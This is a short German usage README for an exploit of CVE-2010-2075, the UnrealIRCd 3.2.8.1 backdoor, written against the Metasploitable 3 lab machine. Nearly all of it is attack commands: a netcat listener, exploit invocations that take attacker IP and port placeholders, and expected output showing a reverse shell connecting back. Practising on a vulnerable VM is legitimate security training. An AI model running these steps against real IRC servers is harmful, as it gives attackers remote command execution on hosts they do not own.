
Ruby- und Python-Exploit für CVE-2010-2075, der auf UnrealIRCd 3.2.8.1 abzielt und Remote-Reverse-Shell-Zugriff auf Metasploitable 3 ermöglicht.
Auf der Shell des Angreifers
nc -nlvp 1111
Auf der Shell des Opfers
ruby exploit.rb 127.0.0.1
Erwartete Ausgabe auf der Shell des Angreifers
listening on [any] 1111 ...
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.105] 48144
boba_fett
Auf der Shell des Opfers
python3 exploit.py -ri 127.0.0.1 -rp 6697 -cmd <command> -li <attacker_ip> -lp <attacker_port>
Auf der Shell des Angreifers
nc -nlvp 1111